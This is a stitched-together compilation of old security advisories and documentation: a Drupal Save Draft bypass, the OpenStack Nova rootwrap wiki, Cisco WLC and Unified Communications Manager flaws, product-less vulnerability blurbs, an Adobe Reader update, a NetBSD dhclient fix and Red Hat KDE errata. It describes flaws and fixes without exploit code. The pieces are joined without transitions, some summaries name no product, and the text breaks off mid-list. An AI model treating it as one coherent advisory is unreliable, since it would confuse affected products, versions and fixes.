• If you use the Node Reference URL Widget module for Drupal 7.x upgrade to Node Reference URL Widget 7.x-1.10.

See also the Node Reference URL Widget project page.

The Save Draft module adds a "Save as draft" button to the node form, letting content creators easily save a post in unpublished draft form.

The module adds validation to individual form actions, thereby bypassing any form-wide validation that is normally performed before saving content. This is a security vulnerability for sites where other modules are using node validation for security purposes.

Versions affected

• Save Draft module for Drupal 6.x versions prior to 6.x-1.8
• Save Draft module for Drupal 7.x versions prior to 7.x-1.4

Drupal core is not affected. If you do not use the contributed Save Draft module, there is nothing you need to do.

Install the latest version:

• If you use the Save Draft module for Drupal 6.x, upgrade to Save Draft 6.x-1.8. (Note that the 6.x-2.x branch of the module is not affected. If you use that, you do not need to upgrade.)
• If you use the Save Draft module for Drupal 7.x, upgrade to Save Draft 7.x-1.4.

See also the Save Draft project page.

Nova root wrapper

Architecture

Purpose

The goal of the root wrapper is to allow the nova unprivileged user to run a number of actions as the root user, in the safest manner possible. Historically, Nova used a specific sudoers file listing every command that the nova user was allowed to run, and just used sudo to run that command as root. However this was difficult to maintain (the sudoers file was in packaging), and did not allow for complex filtering of parameters (advanced filters). The rootwrap was designed to solve those issues.

How rootwrap works

Instead of just calling sudo make me a sandwich, Nova calls sudo nova-rootwrap /etc/nova/rootwrap.conf make me a sandwich. A generic sudoers entry lets the nova user run nova-rootwrap as root. nova-rootwrap looks for filter definition directories in its configuration file, and loads command filters from them. Then it checks if the command requested by Nova matches one of those filters, in which case it executes the command (as root). If no filter matches, it denies the request.

Security model

The escalation path is fully controlled by the root user. A sudoers entry (owned by root) allows nova to run (as root) a specific rootwrap executable, and only with a specific configuration file (which should be owned by root). nova-rootwrap imports the Python modules it needs from a cleaned (and system-default) PYTHONPATH. The configuration file (also root-owned) points to root-owned filter definition directories, which contain root-owned filters definition files. This chain ensures that the nova user itself is not in control of the configuration or modules used by the nova-rootwrap executable.

Rootwrap for users

Nova configuration

You must provide the location of the rootwrap configuration file to Nova, by setting the following in nova.conf:

rootwrap_config=/etc/nova/rootwrap.conf

The configuration file used here must match the one defined in the sudoers entry (see below), otherwise the commands will be rejected ! There is no need to specify the root_helper parameter anymore.

Rootwrap for packagers

Sudoers entry

Packagers need to make sure that Nova nodes contain a sudoers entry that lets the nova user run nova-rootwrap as root, pointing to the root-owned rootwrap.conf configuration file and allowing any parameter after that:

nova ALL = (root) NOPASSWD: /usr/bin/nova-rootwrap /etc/nova/rootwrap.conf *

Filters path

Nova looks for a filters_path in rootwrap.conf, which contains the directories it should load filter definition files from. It is recommended that Nova-provided filters files are loaded from /usr/share/nova/rootwrap and extra user filters files are loaded from /etc/nova/rootwrap.d.

[DEFAULT]
filters_path=/etc/nova/rootwrap.d,/usr/share/nova/rootwrap

Directories defined on this line should all exist, be owned and writeable only by the root user.

Filter definitions

Finally, packaging needs to install, for each node, the filters definition file that corresponds to it. You should not install any other filters file on that node, otherwise you would allow extra unneeded commands to be run by nova as root.

The filter file corresponding to the node must be installed in one of the filters_path directories (preferably /usr/share/nova/rootwrap). For example, on compute nodes, you should only have /usr/share/nova/rootwrap/compute.filters. The file should be owned and writeable only by the root user.

All filter definition files can be found in Nova source code under etc/nova/rootwrap.d.

Rootwrap for plug-in writers

Adding new run-as-root commands

Plug-in writers may need to have the nova user run additional commands as root. They should use nova.utils.execute(run_as_root=True) to achieve that. They should create their own filter definition file and install it (owned and writeable only by the root user !) into one of the filters_path directories (preferably /etc/nova/rootwrap.d). For example the foobar plugin could define its extra filters in a /etc/nova/rootwrap.d/foobar.filters file.

The format of the filter file is defined below, in the Reference section.

Rootwrap for core developers

Adding new run-as-root commands

Core developers may need to have the nova user run additional commands as root. They should use nova.utils.execute(run_as_root=True) to achieve that, and add a filter for the command they need in the corresponding etc/nova/rootwrap.d/ .filters file in Nova's source code. For example, to add a command that needs to be tun by network nodes, they should modify the etc/nova/rootwrap.d/network.filters file.

The format of the filter file is defined below, in the Reference section.

Adding your own filter types

The default filter type, CommandFilter, is pretty basic. It only checks that the command name matches, it does not perform advanced checks on the command arguments. A number of other more command-specific filter types are available, see the Reference section for details.

That said, you can easily define new filter types to further control what exact command you actually allow the nova user to run as root. See nova/rootwrap/filters.py for details.

Reference

rootwrap.conf

The rootwrap.conf file is used to influence how nova-rootwrap works. Since it's in the trusted security path, it needs to be owned and writeable only by the root user. Its location is specified both in the sudoers entry and in the Nova configuration file.

It uses an INI file format with the following sections and parameters:

.filters files

Filters definition files contain lists of filters that nova-rootwrap will use to allow or deny a specific command. They are generally suffixed by .filters. Since they are in the trusted security path, they need to be owned and writeable only by the root user. Their location is specified in the rootwrap.conf file.

It uses an INI file format with a [Filters] section and several lines, each with a unique parameter name (different for each filter you define):

See below for parameters to each Filter classes.

Available Filter classes

CommandFilter

gereic basic filter that only checks the executable called. Parameters are:

1. Executable allowed
2. User to run the command under

Example: allow the nova user to run /sbin/kpartx as the root user, with any parameters:  kpartx: CommandFilter, /sbin/kpartx, root 

RegExpFilter

Generic filter that checks the executable called, then uses a list of regular expressions to check all subsequent arguments. Parameters are:

1. Executable allowed
2. User to run the command under
3. (and following) Regular expressions to use to match first (and subsequent) command arguments

Example: allow the nova user to run tunctl, but only with three parameters with the first two being -b and -t:  tunctl: /usr/sbin/tunctl, root, -b, -t, .* 

ReadFileFilter

Specific filter that lets you read files as root using cat. Parameters are:

1. Path to the file that you want to read as the root user.

Example: allow the nova user to run "cat /etc/iscsi/initiatorname.iscsi" as root:  read_initiator: ReadFileFilter, /etc/iscsi/initiatorname.iscsi 

KillFilter

Kill-specific filter that checks the affected process and the signal sent before allowing the command. Parameters are:

1. User to run kill under
2. Only affect processes running that executable
3. (and following) Signals you're allowed to send

Example: allow the nova user to send -9 or -HUP signals to /usr/sbin/dnsmasq processes:  kill_dnsmasq: KillFilter, root, /usr/sbin/dnsmasq, -9, -HUP 

DnsmasqFilter

Very specific filter that will allow to run dnsmasq as root with the FLAGFILE and NETWORK_ID environment variables set. The command should be called like this: FLAGFILE=foo NETWORK_ID=bar dnsmasq... Parameters are:

1. Executable to use for dnsmasq
2. User to run dnsmasq under

Example: allow the nova user to run FLAGFILE=foo NETWORK_ID=bar dnsmasq ... as root:  dnsmasq: DnsmasqFilter, /usr/sbin/dnsmasq, root 

Wiki: Nova/Rootwrap (последним исправлял пользователь ThierryCarrez 2012-08-03 12:09:30)

Cisco WLCs and Cisco WiSMs are responsible for system-wide wireless LAN functions, such as security policies, intrusion prevention, RF management, quality of service (QoS), and mobility.

These devices communicate with controller-based access points over any Layer 2 (Ethernet) or Layer 3 (IP) infrastructure using the Lightweight Access Point Protocol (LWAPP) and the Control and Provisioning of Wireless Access Points (CAPWAP) protocol.

The Cisco WLC family of devices is affected by a DoS vulnerability that can allow an unauthenticated attacker to cause the device to reload by sending a series of ICMP packets. This vulnerability can be exploited from both wired and wireless segments.

This vulnerability is documented in Cisco bug ID CSCth74426 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2011-1613.

Vulnerable Products

This vulnerability affects Cisco WLC software versions 6.0 and later. The following products are affected by the vulnerability described in this Security Advisory:

• Cisco 2100 Series Wireless LAN Controllers
• Cisco WLC526 Mobility Express Controller (AIR-WLC526-K9)
• Cisco NME-AIR-WLC Modules for Integrated Services Routers (ISRs)
• Cisco NM-AIR-WLC Modules for Integrated Services Routers (ISRs)

Note: The Cisco NM-AIR-WLC have reached End-of-Life and End-of-Software Maintenance. Please refer to the following document for more information: http://www.cisco.com/en/US/prod/collateral/modules/ps2797/prod_end-of-life_notice0900aecd806aeb34.html

Determination of Software Versions

Administrators can use these instructions to determine the software version that is running on a Cisco WLC using the web or command-line interface or on a Cisco WiSM (using commands on a Cisco Catalyst 6500 Series Switch and Cisco 7600 Series Router).

Cisco Wireless Controllers

To determine the WLC version that is running in a given environment, use one of the following methods:

• In the web interface, choose the Monitor tab, click Summary in the left pane, and note the Software Version field.
  
  Note: Customers who use a Cisco WLC Module in an ISR will need to issue the service-module wlan-controller <slot/port> session command prior to performing the next step on the command line. Customers who use a Cisco Catalyst 3750G Switch with an integrated WLC Module will need to issue the session <Stack-Member-Number> processor 1 session command prior to performing the next step on the command line.
• From the command-line interface, type show sysinfo and note the Product Version field, as shown in this example:
  
  (Cisco Controller)> show sysinfo
  
  Manufacturer's Name.. Cisco Systems Inc.
  Product Name......... Cisco Controller
  Product Version...... 5.1.151.0
  RTOS Version......... Linux-2.6.10_mvl401
  Bootloader Version... 4.0.207.0
  Build Type........... DATA + WPS
  <output suppressed>

Cisco WiSMs

Use the show wism module <module number> controller 1 status command on Cisco Catalyst 6500 Series Switch and Cisco 7600 Series Routers that have a WiSM installed. Note the software version as demonstrated in this example, which shows version 5.1.151.0:

Router# show wism module 3 controller 1 status

WiSM Controller 1 in Slot 3
Operational Status of the Controller
    : Oper-Up
Service VLAN
    : 192
Service Port
    : 10
Service Port Mac Address
    : 0011.92ff.8742
Service IP Address
    : 192.168.10.1
Management IP Address
    : 192.168.1.123
Software Version
    : 5.1.151.0
Port Channel Number
    : 288
Allowed vlan list
    : 30,40
Native VLAN ID
    : 40
WCP Keep Alive Missed
    : 0

Products Confirmed Not Vulnerable

The following Cisco Wireless LAN Controllers are not affected by this vulnerability:

• Cisco 2000 Series WLCs
• Cisco 2500 Series WLCs
• Cisco 4100 Series WLCs
• Cisco 4400 Series WLCs
• Cisco Catalyst 3750G Integrated WLCs
• Cisco 5500 Series WLCs
• Cisco Wireless Services Modules (WiSMs, both WiSM and WiSM2)
• Cisco Wireless Services Ready Engine (SRE) Modules
• Cisco Flex 7500 Series Cloud Controllers

No other Cisco products are currently known to be affected by this vulnerability.

Successful exploitation of this vulnerability could cause an affected device to reload. Repeated exploitation could result in a sustained DoS condition.

Obtaining Fixed Software

Cisco has released free software updates that address this vulnerability. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml.

Software Versions and Fixes

When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance.

If a given release train is vulnerable, then the earliest possible releases that contain the fix (along with the anticipated date of availability for each, if applicable) are listed in the "First Fixed Release" column of the table. A device running a release in the given train that is earlier than the release in a specific column (less than the First Fixed Release) is known to be vulnerable.

Cisco Unified Communications Manager is the call processing component of the Cisco IP Telephony solution that extends enterprise telephony features and functions to packet telephony network devices such as IP phones, media processing devices, VoIP gateways, and multimedia applications.

DoS Vulnerabilities in SIP

Cisco Unified Communications Manager contains three DoS vulnerabilities that involve the processing of SIP messages. Each vulnerability is triggered by a malformed SIP message that could cause a critical process to fail, resulting in the disruption of voice services. All SIP ports (TCP ports 5060 and 5061 and UDP ports 5060 and 5061) are affected.

The first SIP DoS vulnerability is documented in Cisco Bug ID CSCti42904 and has been assigned Common Vulnerabilities and Exposures (CVE) identifier CVE-2011-1604. This vulnerability is fixed in Cisco Unified Communications Manager versions 8.5(1), 8.0(3a)su2, 7.1(5b)su3, and 6.1(5)su3.

The second SIP DoS vulnerability is documented in Cisco Bug ID CSCth39586 and has been assigned CVE identifier CVE-2011-1605. This vulnerability is fixed in Cisco Unified Communications Manager versions 8.5(1), 8.0(3), 7.1(5b)su2, and 6.1(5)su2.

The third SIP DoS vulnerability is documented in Cisco Bug ID CSCtg62855 and has been assigned CVE identifier CVE-2011-1606. This vulnerability is fixed in Cisco Unified Communications Manager versions 8.5(1), 8.0(3), 7.1(5)su1, and 6.1(5)su2.

Directory Transversal Vulnerability

Cisco Unified Communications Manager contains a vulnerability that involves the processing of POST requests. An authenticated, remote attacker with the ability to intercept a packet to the affected device could specify a different location or filename, which may result in the upload of a malicious file. This vulnerability is documented in Cisco Bug ID CSCti81603 and has been assigned CVE identifier CVE-2011-1607. The second vulnerability is fixed in Cisco Unified Communications Manager versions 8.5(1), 8.0(3a)su1, 7.1(5b)su3, and 6.1(5)su3.

SQL Injection Vulnerabilities

Cisco Unified Communications Manager is affected by the following SQL injection vulnerabilities:

• The first vulnerability could allow an authenticated, remote attacker to modify the system configuration; create, modify and delete users; or modify the configuration of Cisco Unified Communications Manager. This vulnerability is documented in Cisco Bug ID CSCtg85647 and has been assigned CVE identifier CVE-2011-1609. This vulnerability is fixed in Cisco Unified Communications Manager versions 8.5(1), 8.0(3), 7.1(5)su1, and 6.1(5)su2.
• The second vulnerability could allow an unauthenticated, remote attacker to modify system configuration; create, modify, and delete users; or modify the configuration of Cisco Unified Communications Manager. This vulnerability is documented in Cisco Bug ID CSCtj42064 ( registered customers only) and has been assigned CVE identifier CVE-2011-1610. This vulnerability is fixed in Cisco Unified Communications Manager versions 8.5(1)su1, 8.0(3a)su2, 7.1(5)su4, and 6.1(5)su3.

Successful exploitation of the vulnerabilities that are described in this advisory could result in the interruption of voice services, privilege escalation and possible data modification. In the case of DoS attacks, the affect Cisco Unified Communications Manager processes will restart, but repeated attacks may result in a sustained DoS condition.

Vulnerable Products

The following products are affected by at least one of the vulnerabilities that are described in this advisory:

• Cisco Unified Communications Manager 6.x
• Cisco Unified Communications Manager 7.x
• Cisco Unified Communications Manager 8.x

Note: Cisco Unified Communications Manager version 5.1 reached end of software maintenance on February 13, 2010. Customers who are using Cisco Unified Communications Manager 5.x versions should contact your Cisco support team for assistance in upgrading to a supported version of Cisco Unified Communications Manager.

Products Confirmed Not Vulnerable

Cisco Unified Communications Manager version 4.x is not affected by these vulnerabilities. No other Cisco products are currently known to be affected by these vulnerabilities.

Obtaining Fixed Software

Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml.

Workarounds

A workaround exists only for the SIP DoS vulnerabilities. Cisco Unified Communications Manager versions 6.1(4), 7.1(2), and 8.0(1) introduced the ability to disable SIP processing. SIP processing is enabled by default. Customers who do not use SIP processing can use the following instructions to disable SIP processing:

• Step 1: Log into the Cisco Unified Communications Manager Administration web interface.
• Step 2: Navigate to System > Service Parameters and select the appropriate Cisco Unified Communications Manager server and the Cisco CallManager Service.
• Step 3: Change the "SIP Interoperability Enabled" parameter to False, and click Save.

Note: For a SIP processing change to take effect, the Cisco CallManager Service must be restarted. For information on how to restart the service, refer to the "Restarting the Cisco CallManager Service" section of the document at the following location: http://www.cisco.com/en/US/docs/voice_ip_comm/cucm/admin/7_1_2/ccmcfg/b03dpi.html#wp1075124

It is possible to mitigate these vulnerabilities by implementing filtering on screening devices and permitting access to TCP ports 5060 and 5061 and UDP ports 5060 and 5061 only from networks that require SIP access to Cisco Unified Communications Manager servers.

Additional mitigations that can be deployed on Cisco devices in the network are available in the companion document "Cisco Applied Mitigation Bulletin: Identifying and Mitigating Exploitation of the Multiple Vulnerabilities in Cisco Unified Communications Manager" which is available at the following location:
http://www.cisco.com/warp/public/707/cisco-amb-20110427-cucm.shtml

Software Versions and Fixes

When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance.

When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. Cisco recommends upgrading to a release equal to or later than the release in the "Recommended Releases" column of the table.

Note: The 7.1(5b)SU4 release of Cisco Unified Communications Manager is expected to be available by the end of April 2011.

A remote user can determine the full path to the web root directory and other potentially sensitive information.

 Not available.

The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in "v1" variable. Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.

 Not available.

 User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the "showimage.php" script to properly sanitize user-supplied input in "id" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

Not available. 

User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the "index.php" script to properly sanitize user-supplied input in "col_18", "description" variables. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

 Not available.

User can execute arbitrary JavaScript code within the vulnerable application. The vulnerabilities exists due to failure in the "admin/commonlib/lib/userlib.php", "admin/template.php", "admin/editlist.php" scripts to properly sanitize user-supplied input in "email" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

 Not available.

User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the "function.php" script to properly sanitize user-supplied input in "number" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

 Not available.

The vulnerability exists due to failure in the "languages/language_selection.inc.php" script, it's possible to generate an error that will reveal the full path of the script. A remote user can determine the full path to the web root directory and other potentially sensitive information.

 Not available.

The vulnerability exists due to failure in the "admin/configure.php" script to properly verify the source of HTTP request. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

Attacker can use browser to exploit this vulnerability.

Not available.

Critical vulnerabilities have been identified in Adobe Reader and Acrobat X (10.0.2) and earlier 10.x and 9.x versions for Windows and Macintosh operating systems. These vulnerabilities, including CVE-2011-0611, as referenced in Security Advisory APSA11-02, could cause a crash and potentially allow an attacker to take control of the affected system. There are reports that one of the vulnerabilities, CVE-2011-0611, is being actively exploited in the wild against both
Adobe Flash Player, and Adobe Reader and Acrobat, as well as via a Flash (.swf) file embedded in a Microsoft Word (.doc) or Microsoft Excel (.xls) file delivered as an email attachment targeting the Windows platform. Adobe Reader X Protected Mode mitigations would prevent an exploit of this kind from executing.

Adobe recommends users of Adobe Reader X (10.0.2) for Macintosh update to Adobe Reader X (10.0.3). For users of Adobe Reader 9.4.3 for Windows and Macintosh, Adobe has made available the update, Adobe Reader 9.4.4. Adobe recommends users of Adobe Acrobat X (10.0.2) for Windows and Macintosh update to Adobe Acrobat X (10.0.3). Adobe recommends users of Adobe Acrobat 9.4.3 for Windows and Macintosh update to Adobe Acrobat 9.4.4. Because Adobe Reader X Protected Mode would prevent exploits of the type targeting CVE-2011-0611 from executing, we are currently planning to address these issues in Adobe Reader X for Windows with the next quarterly security update for Adobe Reader, currently scheduled for June 14, 2011. Today's security updates are out-of-cycle updates.

Affected software versions

• Adobe Reader X (10.0.1) and earlier versions for Windows
• Adobe Reader X (10.0.2) and earlier versions for Macintosh
• Adobe Acrobat X (10.0.2) and earlier versions for Windows and Macintosh

Note: Adobe Reader 9.x for UNIX, Adobe Reader for Android, and Adobe Reader and Acrobat 8.x are not affected by CVE-2011-0611.

Adobe recommends users update their software installations by following the instructions below:

Adobe Reader

Users on Windows and Macintosh can utilize the product's update mechanism. The default configuration is set to run automatic update checks on a regular schedule. Update checks can be manually activated by choosing Help > Check for Updates.

Adobe Reader 9.x users on Windows can also find the appropriate update here: 
http://www.adobe.com/support/downloads/product.jsp?product=10&platform=Windows.

Adobe Reader 10.x and 9.x users on Macintosh can also find the appropriate update here:
http://www.adobe.com/support/downloads/product.jsp?product=10&platform=Macintosh.

Because Adobe Reader X (10.x) Protected Mode would prevent an exploit of this kind from executing, we are planning to address this issue in
Adobe Reader X for Windows with the next quarterly security update for Adobe Reader, currently scheduled for June 14, 2011.

Adobe Acrobat

Users can utilize the product's update mechanism. The default configuration is set to run automatic update checks on a regular schedule. Update checks can be manually activated by choosing Help >Check for Updates.

Acrobat Standard and Pro 10.x and 9.x users on Windows can also find the appropriate update here:
http://www.adobe.com/support/downloads/product.jsp?product=1&platform=Windows.

Acrobat Pro Extended 9.x users on Windows can also find the appropriate update here:
http://www.adobe.com/support/downloads/product.jsp?product=158&platform=Windows.

Acrobat Pro users on Macintosh can also find the appropriate update here:
http://www.adobe.com/support/downloads/product.jsp?product=1&platform=Macintosh.

Adobe categorizes these as critical updates and recommends affected users update their installations to the newest versions.

 ISC dhclient did not strip or escape certain shell meta-characters in responses from the dhcp server (like hostname) before passing the responses on to dhclient-script. This may result in execution of exploit code on the client.

For more details, please see CVE-2011-0997.

dhclient(1) exports many variables to the environment, some of which are strings provided by the dhcp server and were not being sanity checked for shell metacharacters. Although in the current implementation of /sbin/dhclient-script "eval" is only used in ifconfig(8) commands with arguments from the environment that cannot be set to strings by the dhcp server ($interface, $medium are set by the client;
$new_ip_address, $new_netmask_arg, $new_broadcast_arg, $alias_ip_address, $old_ip_address are IP addresses), one should either patch dhclient
to sanitize all variables or add the following line to /sbin/dhclient-script at the beginning of the set_hostname() function:

new_host_name="$(echo "${new_host_name}" | sed -e 's/[^a-zA-Z0-9-]*//g')"

The reason to do this, is that unless the hostname is sanitized, a hostname with shell metacharacters can be set on the system, and other scripts might break that use the compromised hostname.

In environments where filters/acls can be put into place to limit clients to accessing only legitimate dhcp servers, this will protect clients from rogue dhcp servers deliberately trying to exploit this bug. However, this will not protect from compromised servers.

Further workarounds: disable dhclient(8) from the base OS and use the fixed isc-dhclient4 package from pkgsrc.

The following instructions describe how to upgrade your dhclient binaries by updating your source tree and rebuilding and installing a new version of dhclient.

• HEAD - src/dist/dhcp/client/dhclient.c - 1.21
• netbsd-5-0 - src/dist/dhcp/client/dhclient.c - 1.19.12.2
• netbsd-5-1 - src/dist/dhcp/client/dhclient.c - 1.19.8.1.2.1
• netbsd-5 - src/dist/dhcp/client/dhclient.c - 1.19.8.2
• netbsd-4-0 - src/dist/dhcp/client/dhclient.c - 1.18.12.2
• netbsd-4 - src/dist/dhcp/client/dhclient.c - 1.18.2.2

The following instructions briefly summarize how to update and recompile dhclient. In these instructions, replace:

VERSION - with the fixed version from the appropriate CVS branch (from the above table)

FILE - with the name of the file from the above table

To update from CVS, re-build, and re-install dhclient:

# cd src
# cvs update -d -P -r VERSION FILE
# cd usr.sbin/dhcp
# make USETOOLS=no cleandir dependall
# cd client
# make USETOOLS=no install

Updated kdenetwork packages that fix one security issue are now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.

The kdenetwork packages contain networking applications for the K Desktop Environment (KDE).

A directory traversal flaw was found in the way KGet, a download manager, handled the "file" element in Metalink files. An attacker could use this flaw to create a specially-crafted Metalink file that, when opened, would cause KGet to overwrite arbitrary files accessible to the user running KGet. (CVE-2011-1586)

Users of kdenetwork should upgrade to these updated packages, which contain a backported patch to resolve this issue. The desktop must be restarted (log out, then log back in) for this update to take effect.

Before applying this update, make sure all previously-released errata relevant to your system have been applied.

This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/kb/docs/DOC-11259

Bugs fixed (http://bugzilla.redhat.com/):

697042 - CVE-2011-1586 kdenetwork: incomplete fix for CVE-2010-1000

Package List:

Red Hat Enterprise Linux Desktop (v. 6):

Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/kdenetwork-4.3.4-11.el6_0.1.src.rpm

i386:

• kdenetwork-4.3.4-11.el6_0.1.i686.rpm
• kdenetwork-debuginfo-4.3.4-11.el6_0.1.i686.rpm
• kdenetwork-libs-4.3.4-11.el6_0.1.i686.rpm

x86_64:

• kdenetwork-4.3.4-11.el6_0.1.x86_64.rpm
• kdenetwork-debuginfo-4.3.4-11.el6_0.1.x86_64.rpm
• kdenetwork-libs-4.3.4-11.el6_0.1.x86_64.rpm

Red Hat Enterprise Linux Desktop Optional (v. 6):

Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/kdenetwork-4.3.4-11.el6_0.1.src.rpm

i386:

• kdenetwork-debuginfo-4.3.4-11.el6_0.1.i686.rpm
• kdenetwork-devel-4.3.4-11.el6_0.1.i686.rpm

x86_64:

• kdenetwork-debuginfo-4.3.4-11.el6_0.1.i686.rpm
• kdenetwork-debuginfo-4.3.4-11.el6_0.1.x86_64.rpm
• kdenetwork-devel-4.3.4-11.el6_0.1.i686.rpm
• kdenetwork-devel-4.3.4-11.el6_0.1.x86_64.rpm
• kdenetwork-libs-4.3.4-11.el6_0.1.i686.rpm

Red Hat Enterprise Linux Server (v. 6):

Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/kdenetwork-4.3.4-11.el6_0.1.src.rpm

i386:

• kdenetwork-4.3.4-11.el6_0.1.i686.rpm
• kdenetwork-debuginfo-4.3.4-11.el6_0.1.i686.rpm
• kdenetwork-devel-4.3.4-11.el6_0.1.i686.rpm
• kdenetwork-libs-4.3.4-11.el6_0.1.i686.rpm

ppc64:

• kdenetwork-4.3.4-11.el6_0.1.ppc64.rpm
• kdenetwork-debuginfo-4.3.4-11.el6_0.1.ppc.rpm
• kdenetwork-debuginfo-4.3.4-11.el6_0.1.ppc64.rpm
• kdenetwork-devel-4.3.4-11.el6_0.1.ppc.rpm
• kdenetwork-devel-4.3.4-11.el6_0.1.ppc64.rpm
• kdenetwork-libs-4.3.4-11.el6_0.1.ppc.rpm
• kdenetwork-libs-4.3.4-11.el6_0.1.ppc64.rpm

s390x:

• kdenetwork-4.3.4-11.el6_0.1.s390x.rpm
• kdenetwork-debuginfo-4.3.4-11.el6_0.1.s390.rpm
• kdenetwork-debuginfo-4.3.4-11.el6_0.1.s390x.rpm
• kdenetwork-devel-4.3.4-11.el6_0.1.s390.rpm
• kdenetwork-devel-4.3.4-11.el6_0.1.s390x.rpm
• kdenetwork-libs-4.3.4-11.el6_0.1.s390.rpm
• kdenetwork-libs-4.3.4-11.el6_0.1.s390x.rpm

x86_64:

• kdenetwork-4.3.4-11.el6_0.1.x86_64.rpm
• kdenetwork-debuginfo-4.3.4-11.el6_0.1.i686.rpm
• kdenetwork-debuginfo-4.3.4-11.el6_0.1.x86_64.rpm
• kdenetwork-devel-4.3.4-11.el6_0.1.i686.rpm
• kdenetwork-devel-4.3.4-11.el6_0.1.x86_64.rpm
• kdenetwork-libs-4.3.4-11.el6_0.1.i686.rpm
• kdenetwork-libs-4.3.4-11.el6_0.1.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 6):

Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/kdenetwork-4.3.4-11.el6_0.1.src.rpm

i386:

• kdenetwork-4.3.4-11.el6_0.1.i686.rpm
• kdenetwork-debuginfo-4.3.4-11.el6_0.1.i686.rpm
• kdenetwork-devel-4.3.4-11.el6_0.1.i686.rpm
• kdenetwork-libs-4.3.4-11.el6_0.1.i686.rpm

x86_64:

• kdenetwork-4.3.4-11.el6_0.1.x86_64.rpm
• kdenetwork-debuginfo-4.3.4-11.el6_0.1.i686.rpm
• kdenetwork-debuginfo-4.3.4-11.el6_0.1.x86_64.rpm
• kdenetwork-devel-4.3.4-11.el6_0.1.i686.rpm
• kdenetwork-devel-4.3.4-11.el6_0.1.x86_64.rpm
• kdenetwork-libs-4.3.4-11.el6_0.1.i686.rpm
• kdenetwork-libs-4.3.4-11.el6_0.1.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package

Updated kdelibs packages that fix two security issues are now available for Red Hat Enterprise Linux 6.

The Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.

The kdelibs packages provide libraries for the K Desktop Environment (KDE).

A cross-site scripting (XSS) flaw was found in the way KHTML, the HTML layout engine used by KDE applications such as the Konqueror web browser, displayed certain error pages. A remote attacker could use this flaw to perform a cross-site scripting attack against victims by tricking them into
visiting a specially-crafted URL. (CVE-2011-1168)

A flaw was found in the way kdelibs checked the user specified hostname against the name in the server's SSL certificate. A man-in-the-middle attacker could use this flaw to trick an application using kdelibs into mistakenly accepting a certificate as if it was valid for the host, if that certificate was issued for an IP address to which the user specified hostname was resolved to. (CVE-2011-1094)

Note: As part of the fix for CVE-2011-1094, this update also introduces stricter handling for wildcards used in servers' SSL certificates.

Users should upgrade to these updated packages, which contain backported patches to correct these issues. The desktop must be restarted (log out, then log back in) for this update to take effect.

Before applying this update, make sure all previously-released errata relevant to your system have been applied.

This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/kb/docs/DOC-11259

Bugs fixed (http://bugzilla.redhat.com/):

• 632114 - CVE-2011-1094 kdelibs: SSL certificate for IP address accepted as valid for hosts that resolve to the IP
• 695398 - CVE-2011-1168 kdelibs: partially universal XSS in Konqueror error pages

Package List:

Red Hat Enterprise Linux Desktop (v. 6):

Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/kdelibs-4.3.4-11.el6_0.2.src.rpm

i386:

• kdelibs-4.3.4-11.el6_0.2.i686.rpm
• kdelibs-common-4.3.4-11.el6_0.2.i686.rpm
